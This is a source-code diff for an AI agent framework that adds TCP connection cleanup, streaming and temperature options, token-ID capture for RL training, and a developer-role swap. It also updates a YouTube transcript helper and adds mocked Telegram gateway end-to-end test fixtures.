cfg_base_url = str(model_cfg.get("base_url") or "").strip().rstrip("/")
|
||||
base_url = cfg_base_url or base_url or "https://api.anthropic.com"
|
||||
elif provider == "openrouter":
|
||||
base_url = base_url or OPENROUTER_BASE_URL
|
||||
elif provider == "nous":
|
||||
api_mode = "chat_completions"
|
||||
elif provider == "copilot":
|
||||
|
||||
337
run_agent.py
337
run_agent.py
@@ -88,7 +88,7 @@ from agent.model_metadata import (
|
||||
)
|
||||
from agent.context_compressor import ContextCompressor
|
||||
from agent.prompt_caching import apply_anthropic_cache_control
|
||||
from agent.prompt_builder import build_skills_system_prompt, build_context_files_prompt, load_soul_md, TOOL_USE_ENFORCEMENT_GUIDANCE, TOOL_USE_ENFORCEMENT_MODELS
|
||||
from agent.prompt_builder import build_skills_system_prompt, build_context_files_prompt, load_soul_md, TOOL_USE_ENFORCEMENT_GUIDANCE, TOOL_USE_ENFORCEMENT_MODELS, DEVELOPER_ROLE_MODELS
|
||||
from agent.usage_pricing import estimate_usage_cost, normalize_usage
|
||||
from agent.display import (
|
||||
KawaiiSpinner, build_tool_preview as _build_tool_preview,
|
||||
@@ -471,7 +471,7 @@ class AIAgent:
|
||||
acp_args: list[str] | None = None,
|
||||
command: str = None,
|
||||
args: list[str] | None = None,
|
||||
model: str = "anthropic/claude-opus-4.6", # OpenRouter format
|
||||
model: str = "",
|
||||
max_iterations: int = 90, # Default tool-calling iterations (shared with subagents)
|
||||
tool_delay: float = 1.0,
|
||||
enabled_toolsets: List[str] = None,
|
||||
@@ -516,6 +516,9 @@ class AIAgent:
|
||||
checkpoint_max_snapshots: int = 50,
|
||||
pass_session_id: bool = False,
|
||||
persist_session: bool = True,
|
||||
use_streaming: bool = True,
|
||||
temperature: float = None,
|
||||
insert_reasoning: bool = True,
|
||||
):
|
||||
"""
|
||||
Initialize the AI Agent.
|
||||
@@ -559,11 +562,17 @@ class AIAgent:
|
||||
When provided and Honcho is enabled in config, enables persistent cross-session user modeling.
|
||||
honcho_manager: Optional shared HonchoSessionManager owned by the caller.
|
||||
honcho_config: Optional HonchoClientConfig corresponding to honcho_manager.
|
||||
use_streaming (bool): Whether to use streaming for API calls (default: True)
|
||||
temperature (float): Temperature for model responses (optional, uses model default if not set)
|
||||
insert_reasoning (bool): Whether to insert reasoning into the API response (default: True)
|
||||
"""
|
||||
_install_safe_stdio()
|
||||
|
||||
self.model = model
|
||||
self.max_iterations = max_iterations
|
||||
self.use_streaming = use_streaming
|
||||
self.temperature = temperature
|
||||
self.insert_reasoning = insert_reasoning
|
||||
# Shared iteration budget — parent creates, children inherit.
|
||||
# Consumed by every LLM turn across parent + all subagents.
|
||||
self.iteration_budget = iteration_budget or IterationBudget(max_iterations)
|
||||
@@ -586,10 +595,9 @@ class AIAgent:
|
||||
self.log_prefix_chars = log_prefix_chars
|
||||
self.log_prefix = f"{log_prefix} " if log_prefix else ""
|
||||
# Store effective base URL for feature detection (prompt caching, reasoning, etc.)
|
||||
# When no base_url is provided, the client defaults to OpenRouter, so reflect that here.
|
||||
self.base_url = base_url or OPENROUTER_BASE_URL
|
||||
self.base_url = base_url or ""
|
||||
provider_name = provider.strip().lower() if isinstance(provider, str) and provider.strip() else None
|
||||
self.provider = provider_name or "openrouter"
|
||||
self.provider = provider_name or ""
|
||||
self.acp_command = acp_command or command
|
||||
self.acp_args = list(acp_args or args or [])
|
||||
if api_mode in {"chat_completions", "codex_responses", "anthropic_messages"}:
|
||||
@@ -1917,7 +1925,11 @@ class AIAgent:
|
||||
"from": "gpt",
|
||||
"value": content.rstrip()
|
||||
})
|
||||
|
||||
|
||||
if "prompt_token_ids" in msg:
|
||||
trajectory[-1]["prompt_token_ids"] = msg["prompt_token_ids"]
|
||||
trajectory[-1]["generation_token_ids"] = msg["generation_token_ids"]
|
||||
trajectory[-1]["generation_log_probs"] = msg["generation_log_probs"]
|
||||
# Collect all subsequent tool responses
|
||||
tool_responses = []
|
||||
j = i + 1
|
||||
@@ -1979,6 +1991,10 @@ class AIAgent:
|
||||
"from": "gpt",
|
||||
"value": content.strip()
|
||||
})
|
||||
if "prompt_token_ids" in msg:
|
||||
trajectory[-1]["prompt_token_ids"] = msg["prompt_token_ids"]
|
||||
trajectory[-1]["generation_token_ids"] = msg["generation_token_ids"]
|
||||
trajectory[-1]["generation_log_probs"] = msg["generation_log_probs"]
|
||||
|
||||
elif msg["role"] == "user":
|
||||
trajectory.append({
|
||||
@@ -3543,15 +3559,78 @@ class AIAgent:
|
||||
)
|
||||
return client
|
||||
|
||||
@staticmethod
|
||||
def _force_close_tcp_sockets(client: Any) -> int:
|
||||
"""Force-close underlying TCP sockets to prevent CLOSE-WAIT accumulation.
|
||||
|
||||
When a provider drops a connection mid-stream, httpx's ``client.close()``
|
||||
performs a graceful shutdown which leaves sockets in CLOSE-WAIT until the
|
||||
OS times them out (often minutes). This method walks the httpx transport
|
||||
pool and issues ``socket.shutdown(SHUT_RDWR)`` + ``socket.close()`` to
|
||||
force an immediate TCP RST, freeing the file descriptors.
|
||||
|
||||
Returns the number of sockets force-closed.
|
||||
"""
|
||||
import socket as _socket
|
||||
|
||||
closed = 0
|
||||
try:
|
||||
http_client = getattr(client, "_client", None)
|
||||
if http_client is None:
|
||||
return 0
|
||||
transport = getattr(http_client, "_transport", None)
|
||||
if transport is None:
|
||||
return 0
|
||||
pool = getattr(transport, "_pool", None)
|
||||
if pool is None:
|
||||
return 0
|
||||
# httpx uses httpcore connection pools; connections live in
|
||||
# _connections (list) or _pool (list) depending on version.
|
||||
connections = (
|
||||
getattr(pool, "_connections", None)
|
||||
or getattr(pool, "_pool", None)
|
||||
or []
|
||||
)
|
||||
for conn in list(connections):
|
||||
stream = (
|
||||
getattr(conn, "_network_stream", None)
|
||||
or getattr(conn, "_stream", None)
|
||||
)
|
||||
if stream is None:
|
||||
continue
|
||||
sock = getattr(stream, "_sock", None)
|
||||
if sock is None:
|
||||
sock = getattr(stream, "stream", None)
|
||||
if sock is not None:
|
||||
sock = getattr(sock, "_sock", None)
|
||||
if sock is None:
|
||||
continue
|
||||
try:
|
||||
sock.shutdown(_socket.SHUT_RDWR)
|
||||
except OSError:
|
||||
pass
|
||||
try:
|
||||
sock.close()
|
||||
except OSError:
|
||||
pass
|
||||
closed += 1
|
||||
except Exception as exc:
|
||||
logger.debug("Force-close TCP sockets sweep error: %s", exc)
|
||||
return closed
|
||||
|
||||
def _close_openai_client(self, client: Any, *, reason: str, shared: bool) -> None:
|
||||
if client is None:
|
||||
return
|
||||
# Force-close TCP sockets first to prevent CLOSE-WAIT accumulation,
|
||||
# then do the graceful SDK-level close.
|
||||
force_closed = self._force_close_tcp_sockets(client)
|
||||
try:
|
||||
client.close()
|
||||
logger.info(
|
||||
"OpenAI client closed (%s, shared=%s) %s",
|
||||
"OpenAI client closed (%s, shared=%s, tcp_force_closed=%d) %s",
|
||||
reason,
|
||||
shared,
|
||||
force_closed,
|
||||
self._client_log_context(),
|
||||
)
|
||||
except Exception as exc:
|
||||
@@ -3596,6 +3675,76 @@ class AIAgent:
|
||||
with self._openai_client_lock():
|
||||
return self.client
|
||||
|
||||
def _cleanup_dead_connections(self) -> bool:
|
||||
"""Detect and clean up dead TCP connections on the primary client.
|
||||
|
||||
Inspects the httpx connection pool for sockets in unhealthy states
|
||||
(CLOSE-WAIT, errors). If any are found, force-closes all sockets
|
||||
and rebuilds the primary client from scratch.
|
||||
|
||||
Returns True if dead connections were found and cleaned up.
|
||||
"""
|
||||
client = getattr(self, "client", None)
|
||||
if client is None:
|
||||
return False
|
||||
try:
|
||||
http_client = getattr(client, "_client", None)
|
||||
if http_client is None:
|
||||
return False
|
||||
transport = getattr(http_client, "_transport", None)
|
||||
if transport is None:
|
||||
return False
|
||||
pool = getattr(transport, "_pool", None)
|
||||
if pool is None:
|
||||
return False
|
||||
connections = (
|
||||
getattr(pool, "_connections", None)
|
||||
or getattr(pool, "_pool", None)
|
||||
or []
|
||||
)
|
||||
dead_count = 0
|
||||
for conn in list(connections):
|
||||
# Check for connections that are idle but have closed sockets
|
||||
stream = (
|
||||
getattr(conn, "_network_stream", None)
|
||||
or getattr(conn, "_stream", None)
|
||||
)
|
||||
if stream is None:
|
||||
continue
|
||||
sock = getattr(stream, "_sock", None)
|
||||
if sock is None:
|
||||
sock = getattr(stream, "stream", None)
|
||||
if sock is not None:
|
||||
sock = getattr(sock, "_sock", None)
|
||||
if sock is None:
|
||||
continue
|
||||
# Probe socket health with a non-blocking recv peek
|
||||
import socket as _socket
|
||||
try:
|
||||
sock.setblocking(False)
|
||||
data = sock.recv(1, _socket.MSG_PEEK | _socket.MSG_DONTWAIT)
|
||||
if data == b"":
|
||||
dead_count += 1
|
||||
except BlockingIOError:
|
||||
pass # No data available — socket is healthy
|
||||
except OSError:
|
||||
dead_count += 1
|
||||
finally:
|
||||
try:
|
||||
sock.setblocking(True)
|
||||
except OSError:
|
||||
pass
|
||||
if dead_count > 0:
|
||||
logger.warning(
|
||||
"Found %d dead connection(s) in client pool — rebuilding client",
|
||||
dead_count,
|
||||
)
|
||||
self._replace_primary_openai_client(reason="dead_connection_cleanup")
|
||||
return True
|
||||
except Exception as exc:
|
||||
logger.debug("Dead connection check error: %s", exc)
|
||||
return False
|
||||
|
||||
def _create_request_openai_client(self, *, reason: str) -> Any:
|
||||
from unittest.mock import Mock
|
||||
|
||||
@@ -4387,6 +4536,11 @@ class AIAgent:
|
||||
type(e).__name__,
|
||||
e,
|
||||
)
|
||||
self._emit_status(
|
||||
f"⚠️ Connection to provider dropped "
|
||||
f"({type(e).__name__}). Reconnecting… "
|
||||
f"(attempt {_stream_attempt + 2}/{_max_stream_retries + 1})"
|
||||
)
|
||||
# Close the stale request client before retry
|
||||
stale = request_client_holder.get("client")
|
||||
if stale is not None:
|
||||
@@ -4394,7 +4548,21 @@ class AIAgent:
|
||||
stale, reason="stream_retry_cleanup"
|
||||
)
|
||||
request_client_holder["client"] = None
|
||||
# Also rebuild the primary client to purge
|
||||
# any dead connections from the pool.
|
||||
try:
|
||||
self._replace_primary_openai_client(
|
||||
reason="stream_retry_pool_cleanup"
|
||||
)
|
||||
except Exception:
|
||||
pass
|
||||
continue
|
||||
self._emit_status(
|
||||
"❌ Connection to provider failed after "
|
||||
f"{_max_stream_retries + 1} attempts. "
|
||||
"The provider may be experiencing issues — "
|
||||
"try again in a moment."
|
||||
)
|
||||
logger.warning(
|
||||
"Streaming exhausted %s retries on transient error, "
|
||||
"falling back to non-streaming: %s",
|
||||
@@ -4466,6 +4634,12 @@ class AIAgent:
|
||||
self._close_request_openai_client(rc, reason="stale_stream_kill")
|
||||
except Exception:
|
||||
pass
|
||||
# Rebuild the primary client too — its connection pool
|
||||
# may hold dead sockets from the same provider outage.
|
||||
try:
|
||||
self._replace_primary_openai_client(reason="stale_stream_pool_cleanup")
|
||||
except Exception:
|
||||
pass
|
||||
# Reset the timer so we don't kill repeatedly while
|
||||
# the inner thread processes the closure.
|
||||
last_chunk_time["t"] = time.time()
|
||||
@@ -4866,6 +5040,19 @@ class AIAgent:
|
||||
tool_call.pop("call_id", None)
|
||||
tool_call.pop("response_item_id", None)
|
||||
|
||||
# GPT-5 and Codex models respond better to 'developer' than 'system'
|
||||
# for instruction-following. Swap the role at the API boundary so
|
||||
# internal message representation stays uniform ("system").
|
||||
_model_lower = (self.model or "").lower()
|
||||
if (
|
||||
sanitized_messages
|
||||
and sanitized_messages[0].get("role") == "system"
|
||||
and any(p in _model_lower for p in DEVELOPER_ROLE_MODELS)
|
||||
):
|
||||
# Shallow-copy the list + first message only — rest stays shared.
|
||||
sanitized_messages = list(sanitized_messages)
|
||||
sanitized_messages[0] = {**sanitized_messages[0], "role": "developer"}
|
||||
|
||||
provider_preferences = {}
|
||||
if self.providers_allowed:
|
||||
provider_preferences["only"] = self.providers_allowed
|
||||
@@ -4885,6 +5072,8 @@ class AIAgent:
|
||||
"messages": sanitized_messages,
|
||||
"timeout": float(os.getenv("HERMES_API_TIMEOUT", 1800.0)),
|
||||
}
|
||||
if self.temperature is not None:
|
||||
api_kwargs["temperature"] = self.temperature
|
||||
if self.tools:
|
||||
api_kwargs["tools"] = self.tools
|
||||
|
||||
@@ -5059,6 +5248,11 @@ class AIAgent:
|
||||
"reasoning": reasoning_text,
|
||||
"finish_reason": finish_reason,
|
||||
}
|
||||
|
||||
if hasattr(assistant_message, "prompt_token_ids") and assistant_message.prompt_token_ids is not None:
|
||||
msg["prompt_token_ids"] = assistant_message.prompt_token_ids
|
||||
msg["generation_token_ids"] = assistant_message.generation_token_ids
|
||||
msg["generation_log_probs"] = assistant_message.generation_log_probs
|
||||
|
||||
if hasattr(assistant_message, 'reasoning_details') and assistant_message.reasoning_details:
|
||||
# Pass reasoning_details back unmodified so providers (OpenRouter,
|
||||
@@ -5207,7 +5401,7 @@ class AIAgent:
|
||||
api_msg = msg.copy()
|
||||
if msg.get("role") == "assistant":
|
||||
reasoning = msg.get("reasoning")
|
||||
if reasoning:
|
||||
if reasoning and self.insert_reasoning:
|
||||
api_msg["reasoning_content"] = reasoning
|
||||
api_msg.pop("reasoning", None)
|
||||
api_msg.pop("finish_reason", None)
|
||||
@@ -6204,6 +6398,7 @@ class AIAgent:
|
||||
stream_callback: Optional[callable] = None,
|
||||
persist_user_message: Optional[str] = None,
|
||||
sync_honcho: bool = True,
|
||||
dont_review: bool = False,
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Run a complete conversation with tool calling until completion.
|
||||
@@ -6221,7 +6416,7 @@ class AIAgent:
|
||||
synthetic prefixes.
|
||||
sync_honcho: When False, skip writing the final synthetic turn back
|
||||
to Honcho or queuing follow-up prefetch work.
|
||||
|
||||
dont_review: When True, skip reviewing memory and skills.
|
||||
Returns:
|
||||
Dict: Complete conversation result with final response and message history
|
||||
"""
|
||||
@@ -6254,6 +6449,20 @@ class AIAgent:
|
||||
self._last_content_with_tools = None
|
||||
self._mute_post_response = False
|
||||
self._surrogate_sanitized = False
|
||||
|
||||
# Pre-turn connection health check: detect and clean up dead TCP
|
||||
# connections left over from provider outages or dropped streams.
|
||||
# This prevents the next API call from hanging on a zombie socket.
|
||||
if self.api_mode != "anthropic_messages":
|
||||
try:
|
||||
if self._cleanup_dead_connections():
|
||||
self._emit_status(
|
||||
"🔌 Detected stale connections from a previous provider "
|
||||
"issue — cleaned up automatically. Proceeding with fresh "
|
||||
"connection."
|
||||
)
|
||||
except Exception:
|
||||
pass
|
||||
# NOTE: _turns_since_memory and _iters_since_skill are NOT reset here.
|
||||
# They are initialized in __init__ and must persist across run_conversation
|
||||
# calls so that nudge logic accumulates correctly in CLI mode.
|
||||
@@ -6544,7 +6753,7 @@ class AIAgent:
|
||||
# This ensures multi-turn reasoning context is preserved
|
||||
if msg.get("role") == "assistant":
|
||||
reasoning_text = msg.get("reasoning")
|
||||
if reasoning_text:
|
||||
if reasoning_text and self.insert_reasoning:
|
||||
# Add reasoning_content for API compatibility (Moonshot AI, Novita, OpenRouter)
|
||||
api_msg["reasoning_content"] = reasoning_text
|
||||
|
||||
@@ -6672,7 +6881,7 @@ class AIAgent:
|
||||
if self.thinking_callback:
|
||||
self.thinking_callback("")
|
||||
|
||||
_use_streaming = True
|
||||
_use_streaming = self.use_streaming
|
||||
if not self._has_stream_consumers():
|
||||
# No display/TTS consumer. Still prefer streaming for
|
||||
# health checking, but skip for Mock clients in tests
|
||||
@@ -6850,6 +7059,15 @@ class AIAgent:
|
||||
finish_reason = response.choices[0].finish_reason
|
||||
|
||||
if finish_reason == "length":
|
||||
if not self.compression_enabled:
|
||||
return {
|
||||
"final_response": None,
|
||||
"messages": messages,
|
||||
"api_calls": api_call_count,
|
||||
"completed": False,
|
||||
"partial": True,
|
||||
"error": "Response truncated due to output length limit",
|
||||
}
|
||||
self._vprint(f"{self.log_prefix}⚠️ Response truncated (finish_reason='length') - model hit max output tokens", force=True)
|
||||
|
||||
# ── Detect thinking-budget exhaustion ──────────────
|
||||
@@ -7249,7 +7467,7 @@ class AIAgent:
|
||||
or 'error code: 413' in error_msg
|
||||
)
|
||||
|
||||
if is_payload_too_large:
|
||||
if is_payload_too_large and self.compression_enabled:
|
||||
compression_attempts += 1
|
||||
if compression_attempts > max_compression_attempts:
|
||||
self._vprint(f"{self.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached for payload-too-large error.", force=True)
|
||||
@@ -7264,30 +7482,14 @@ class AIAgent:
|
||||
"partial": True
|
||||
}
|
||||
self._emit_status(f"⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
|
||||
|
||||
original_len = len(messages)
|
||||
messages, active_system_prompt = self._compress_context(
|
||||
messages, system_message, approx_tokens=approx_tokens,
|
||||
task_id=effective_task_id,
|
||||
)
|
||||
|
||||
if len(messages) < original_len:
|
||||
self._emit_status(f"🗜️ Compressed {original_len} → {len(messages)} messages, retrying...")
|
||||
time.sleep(2) # Brief pause between compression retries
|
||||
restart_with_compressed_messages = True
|
||||
break
|
||||
else:
|
||||
self._vprint(f"{self.log_prefix}❌ Payload too large and cannot compress further.", force=True)
|
||||
self._vprint(f"{self.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
|
||||
logging.error(f"{self.log_prefix}413 payload too large. Cannot compress further.")
|
||||
self._persist_session(messages, conversation_history)
|
||||
return {
|
||||
"messages": messages,
|
||||
"completed": False,
|
||||
"api_calls": api_call_count,
|
||||
"error": "Request payload too large (413). Cannot compress further.",
|
||||
"partial": True
|
||||
}
|
||||
elif is_payload_too_large and not self.compression_enabled:
|
||||
return {
|
||||
"messages": messages,
|
||||
"completed": False,
|
||||
"api_calls": api_call_count,
|
||||
"error": "Request payload too large (413). Cannot compress further.",
|
||||
"partial": True
|
||||
}
|
||||
|
||||
# Check for context-length errors BEFORE generic 4xx handler.
|
||||
# Local backends (LM Studio, Ollama, llama.cpp) often return
|
||||
@@ -7323,7 +7525,7 @@ class AIAgent:
|
||||
force=True,
|
||||
)
|
||||
|
||||
if is_context_length_error:
|
||||
if is_context_length_error and self.compression_enabled:
|
||||
compressor = self.context_compressor
|
||||
old_ctx = compressor.context_length
|
||||
|
||||
@@ -7392,6 +7594,14 @@ class AIAgent:
|
||||
"error": f"Context length exceeded ({approx_tokens:,} tokens). Cannot compress further.",
|
||||
"partial": True
|
||||
}
|
||||
elif is_context_length_error and not self.compression_enabled:
|
||||
return {
|
||||
"messages": messages,
|
||||
"completed": False,
|
||||
"api_calls": api_call_count,
|
||||
"error": f"Context length exceeded ({approx_tokens:,} tokens). Cannot compress further.",
|
||||
"partial": True
|
||||
}
|
||||
|
||||
# Check for non-retryable client errors (4xx HTTP status codes).
|
||||
# These indicate a problem with the request itself (bad model ID,
|
||||
@@ -7605,6 +7815,9 @@ class AIAgent:
|
||||
break
|
||||
|
||||
try:
|
||||
prompt_token_ids = None
|
||||
generation_token_ids = None
|
||||
generation_log_probs = None
|
||||
if self.api_mode == "codex_responses":
|
||||
assistant_message, finish_reason = self._normalize_codex_response(response)
|
||||
elif self.api_mode == "anthropic_messages":
|
||||
@@ -7614,6 +7827,12 @@ class AIAgent:
|
||||
)
|
||||
else:
|
||||
assistant_message = response.choices[0].message
|
||||
if hasattr(assistant_message, "prompt_token_ids") and assistant_message.prompt_token_ids is not None:
|
||||
prompt_token_ids = assistant_message.prompt_token_ids
|
||||
if hasattr(assistant_message, "generation_token_ids") and assistant_message.generation_token_ids is not None:
|
||||
generation_token_ids = assistant_message.generation_token_ids
|
||||
if hasattr(assistant_message, "generation_log_probs") and assistant_message.generation_log_probs is not None:
|
||||
generation_log_probs = assistant_message.generation_log_probs
|
||||
|
||||
# Normalize content to string — some OpenAI-compatible servers
|
||||
# (llama-server, etc.) return content as a dict or list instead
|
||||
@@ -8056,28 +8275,34 @@ class AIAgent:
|
||||
self._response_was_previewed = True
|
||||
break
|
||||
|
||||
# No fallback -- if reasoning_text exists, the model put its
|
||||
# entire response inside <think> tags; use that as the content.
|
||||
# No fallback -- the model kept emitting <think>...</think>
|
||||
# with empty content for 3 retries. Preserve token IDs from
|
||||
# the last API attempt (reasoning-only generation) so RL can
|
||||
# train on this trajectory instead of dropping it entirely.
|
||||
# Using _build_assistant_message ensures prompt_token_ids,
|
||||
# generation_token_ids, and generation_log_probs are attached
|
||||
# when present on the assistant_message object.
|
||||
if reasoning_text:
|
||||
self._vprint(f"{self.log_prefix}Using reasoning as response content (model wrapped entire response in think tags).", force=True)
|
||||
final_response = reasoning_text
|
||||
empty_msg = {
|
||||
|
||||
# Preserve token IDs from the last API attempt by building the
|
||||
# assistant message from the live API response object. This
|
||||
# avoids the all-empty-output-items ValueError in NeMo RL's
|
||||
# nemo_gym postprocessor when every turn was reasoning-only.
|
||||
try:
|
||||
_last_msg = self._build_assistant_message(assistant_message, finish_reason)
|
||||
messages.append(_last_msg)
|
||||
except Exception:
|
||||
# If assistant_message is out of scope or _build fails,
|
||||
# fall back to a message without token IDs (matches
|
||||
# original behavior).
|
||||
messages.append({
|
||||
"role": "assistant",
|
||||
"content": final_response,
|
||||
"reasoning": reasoning_text,
|
||||
"finish_reason": finish_reason,
|
||||
}
|
||||
messages.append(empty_msg)
|
||||
break
|
||||
|
||||
# Truly empty -- no reasoning and no content
|
||||
empty_msg = {
|
||||
"role": "assistant",
|
||||
"content": final_response,
|
||||
"reasoning": reasoning_text,
|
||||
"finish_reason": finish_reason,
|
||||
}
|
||||
messages.append(empty_msg)
|
||||
})
|
||||
|
||||
self._cleanup_task_resources(effective_task_id)
|
||||
self._persist_session(messages, conversation_history)
|
||||
@@ -8287,7 +8512,9 @@ class AIAgent:
|
||||
and "skill_manage" in self.valid_tool_names):
|
||||
_should_review_skills = True
|
||||
self._iters_since_skill = 0
|
||||
|
||||
if dont_review:
|
||||
_should_review_memory = False
|
||||
_should_review_skills = False
|
||||
# Background memory/skill review — runs AFTER the response is delivered
|
||||
# so it never competes with the user's task for model attention.
|
||||
if final_response and not interrupted and (_should_review_memory or _should_review_skills):
|
||||
@@ -8335,9 +8562,9 @@ class AIAgent:
|
||||
|
||||
def main(
|
||||
query: str = None,
|
||||
model: str = "anthropic/claude-opus-4.6",
|
||||
model: str = "",
|
||||
api_key: str = None,
|
||||
base_url: str = "https://openrouter.ai/api/v1",
|
||||
base_url: str = "",
|
||||
max_turns: int = 10,
|
||||
enabled_toolsets: str = None,
|
||||
disabled_toolsets: str = None,
|
||||
|
||||
@@ -48,7 +48,11 @@ def format_timestamp(seconds: float) -> str:
|
||||
|
||||
|
||||
def fetch_transcript(video_id: str, languages: list = None):
|
||||
"""Fetch transcript segments from YouTube."""
|
||||
"""Fetch transcript segments from YouTube.
|
||||
|
||||
Returns a list of dicts with 'text', 'start', and 'duration' keys.
|
||||
Compatible with youtube-transcript-api v1.x.
|
||||
"""
|
||||
try:
|
||||
from youtube_transcript_api import YouTubeTranscriptApi
|
||||
except ImportError:
|
||||
@@ -56,9 +60,17 @@ def fetch_transcript(video_id: str, languages: list = None):
|
||||
file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
api = YouTubeTranscriptApi()
|
||||
if languages:
|
||||
return YouTubeTranscriptApi.get_transcript(video_id, languages=languages)
|
||||
return YouTubeTranscriptApi.get_transcript(video_id)
|
||||
result = api.fetch(video_id, languages=languages)
|
||||
else:
|
||||
result = api.fetch(video_id)
|
||||
|
||||
# v1.x returns FetchedTranscriptSnippet objects; normalize to dicts
|
||||
return [
|
||||
{"text": seg.text, "start": seg.start, "duration": seg.duration}
|
||||
for seg in result
|
||||
]
|
||||
|
||||
|
||||
def main():
|
||||
|
||||
0
tests/e2e/__init__.py
Normal file
0
tests/e2e/__init__.py
Normal file
173
tests/e2e/conftest.py
Normal file
173
tests/e2e/conftest.py
Normal file
@@ -0,0 +1,173 @@
|
||||
"""Shared fixtures for Telegram gateway e2e tests.
|
||||
|
||||
These tests exercise the full async message flow:
|
||||
adapter.handle_message(event)
|
||||
→ background task
|
||||
→ GatewayRunner._handle_message (command dispatch)
|
||||
→ adapter.send() (captured by mock)
|
||||
|
||||
No LLM, no real platform connections.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import sys
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig
|
||||
from gateway.platforms.base import MessageEvent, SendResult
|
||||
from gateway.session import SessionEntry, SessionSource, build_session_key
|
||||
|
||||
|
||||
#Ensure telegram module is available (mock it if not installed)
|
||||
|
||||
def _ensure_telegram_mock():
|
||||
"""Install mock telegram modules so TelegramAdapter can be imported."""
|
||||
if "telegram" in sys.modules and hasattr(sys.modules["telegram"], "__file__"):
|
||||
return # Real library installed
|
||||
|
||||
telegram_mod = MagicMock()
|
||||
telegram_mod.Update = MagicMock()
|
||||
telegram_mod.Update.ALL_TYPES = []
|
||||
telegram_mod.Bot = MagicMock
|
||||
telegram_mod.constants.ParseMode.MARKDOWN_V2 = "MarkdownV2"
|
||||
telegram_mod.ext.Application = MagicMock()
|
||||
telegram_mod.ext.Application.builder = MagicMock
|
||||
telegram_mod.ext.ContextTypes.DEFAULT_TYPE = type(None)
|
||||
telegram_mod.ext.MessageHandler = MagicMock
|
||||
telegram_mod.ext.CommandHandler = MagicMock
|
||||
telegram_mod.ext.filters = MagicMock()
|
||||
telegram_mod.request.HTTPXRequest = MagicMock
|
||||
|
||||
for name in (
|
||||
"telegram",
|
||||
"telegram.constants",
|
||||
"telegram.ext",
|
||||
"telegram.ext.filters",
|
||||
"telegram.request",
|
||||
):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
_ensure_telegram_mock()
|
||||
|
||||
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
|
||||
|
||||
|
||||
#GatewayRunner factory (based on tests/gateway/test_status_command.py)
|
||||
|
||||
def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
"""Create a GatewayRunner with mocked internals for e2e testing.
|
||||
|
||||
Skips __init__ to avoid filesystem/network side effects.
|
||||
All command-dispatch dependencies are wired manually.
|
||||
"""
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
runner = object.__new__(GatewayRunner)
|
||||
runner.config = GatewayConfig(
|
||||
platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="e2e-test-token")}
|
||||
)
|
||||
runner.adapters = {}
|
||||
runner._voice_mode = {}
|
||||
runner.hooks = SimpleNamespace(emit=AsyncMock(), loaded_hooks=False)
|
||||
|
||||
runner.session_store = MagicMock()
|
||||
runner.session_store.get_or_create_session.return_value = session_entry
|
||||
runner.session_store.load_transcript.return_value = []
|
||||
runner.session_store.has_any_sessions.return_value = True
|
||||
runner.session_store.append_to_transcript = MagicMock()
|
||||
runner.session_store.rewrite_transcript = MagicMock()
|
||||
runner.session_store.update_session = MagicMock()
|
||||
runner.session_store.reset_session = MagicMock()
|
||||
|
||||
runner._running_agents = {}
|
||||
runner._pending_messages = {}
|
||||
runner._pending_approvals = {}
|
||||
runner._session_db = None
|
||||
runner._reasoning_config = None
|
||||
runner._provider_routing = {}
|
||||
runner._fallback_model = None
|
||||
runner._show_reasoning = False
|
||||
|
||||
runner._is_user_authorized = lambda _source: True
|
||||
runner._set_session_env = lambda _context: None
|
||||
runner._should_send_voice_reply = lambda *_a, **_kw: False
|
||||
runner._send_voice_reply = AsyncMock()
|
||||
runner._capture_gateway_honcho_if_configured = lambda *a, **kw: None
|
||||
runner._emit_gateway_run_progress = AsyncMock()
|
||||
|
||||
# Pairing store (used by authorization rejection path)
|
||||
runner.pairing_store = MagicMock()
|
||||
runner.pairing_store._is_rate_limited = MagicMock(return_value=False)
|
||||
runner.pairing_store.generate_code = MagicMock(return_value="ABC123")
|
||||
|
||||
return runner
|
||||
|
||||
|
||||
#TelegramAdapter factory
|
||||
|
||||
def make_adapter(runner) -> TelegramAdapter:
|
||||
"""Create a TelegramAdapter wired to *runner*, with send methods mocked.
|
||||
|
||||
connect() is NOT called — no polling, no token lock, no real HTTP.
|
||||
"""
|
||||
config = PlatformConfig(enabled=True, token="e2e-test-token")
|
||||
adapter = TelegramAdapter(config)
|
||||
|
||||
# Mock outbound methods so tests can capture what was sent
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=True, message_id="e2e-resp-1"))
|
||||
adapter.send_typing = AsyncMock()
|
||||
|
||||
# Wire adapter ↔ runner
|
||||
adapter.set_message_handler(runner._handle_message)
|
||||
runner.adapters[Platform.TELEGRAM] = adapter
|
||||
|
||||
return adapter
|
||||
|
||||
|
||||
#Helpers
|
||||
|
||||
def make_source(chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id=chat_id,
|
||||
user_id=user_id,
|
||||
user_name="e2e_tester",
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_event(text: str, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
|
||||
return MessageEvent(
|
||||
text=text,
|
||||
source=make_source(chat_id, user_id),
|
||||
message_id=f"msg-{uuid.uuid4().hex[:8]}",
|
||||
)
|
||||
|
||||
|
||||
def make_session_entry(source: SessionSource = None) -> SessionEntry:
|
||||
source = source or make_source()
|
||||
return SessionEntry(
|
||||
session_key=build_session_key(source),
|
||||
session_id=f"sess-{uuid.uuid4().hex[:8]}",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
